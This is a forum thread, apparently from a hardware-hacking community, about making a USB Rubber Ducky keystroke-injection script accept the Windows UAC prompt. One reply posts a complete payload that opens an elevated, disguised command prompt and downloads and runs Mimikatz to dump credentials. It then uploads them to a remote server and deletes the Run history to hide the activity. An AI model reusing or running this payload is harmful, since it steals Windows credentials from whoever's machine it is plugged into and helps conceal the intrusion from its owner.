korang Posted September 2, 2016 Share Posted September 2, 2016 OK so when running the "Mr. Robot" attack on a system (yes I am authorized). It seems when it does admin command prompt, the Dialog box becomes back grounded, so the ALT y does not hit yes. Is there any way to may the duck make sure this dialog box is the active window then do the ALT y command?. I have manually tested ALT y and it does work , I just noticed in my testing that for some reason the dialog box is not active and this cause issues with the script running. Or is there a way to psue the script till I hit yes then use the ducky button to continue running script? Thanks Quote Link to comment Share on other sites More sharing options...
Just_a_User Posted September 3, 2016 Share Posted September 3, 2016 Haven't tried - would an alt tab bring it forward? Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted September 3, 2016 Share Posted September 3, 2016 If your target is Windows10, you can do GUI X, then A, then ALT Y. Also may try adding/increasing the delay from launching the UAC to trying to accept it. Maybe the ALT Y you are sending is being sent too fast before the dialog pops up. Quote Link to comment Share on other sites More sharing options...
Viruse Posted September 19, 2016 Share Posted September 19, 2016 i had same problem on windows 10 BUT how i did solved it ? i replaced ALT y by LEFT ENTER so what's LEFT ? it's LEFTARROW on the keyboard so left key make the focus on the YES button!! than hit ENTER ;) here's my payload for windows 10 REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi, SamOX DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 LEFT ENTER DELAY 2000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER DELAY 2000 STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://yourserver/Invoke-Mimikatz.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://yourserver/vc/rx.php', $output) ENTER REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER Good Luck!! Quote Link to comment Share on other sites More sharing options...
patient0 Posted December 1, 2016 Share Posted December 1, 2016 Well, if you're still having trouble, it's because the focus isn't on the fucking window that's asking for permission. PowerShell probably has the focus, though it doesn't seem to be on top. Quote Link to comment Share on other sites More sharing options...
patient0 Posted December 1, 2016 Share Posted December 1, 2016 In that case you might want to try using "GUI s" instead of "GUI r" if you're using Windows 10. Quote Link to comment Share on other sites More sharing options...
Mike_Buddy Posted August 16 Share Posted August 16 Sorry for the delay, but what if I'm doing it on windows 11? The proposed alternatives work in this case? Quote Link to comment Share on other sites More sharing options...
Irukandji Posted August 17 Share Posted August 17 I doubt that they will be back... Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted August 17 Share Posted August 17 21 hours ago, Mike_Buddy said: but what if I'm doing it on windows 11? The proposed alternatives work in this case? yes, there should be no difference on Win 11, just try the shortcuts and commands manually using an ordinary keyboard on a Win11 PC, it's the same thing, the Ducky is just a keyboard (or acts as one) 1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.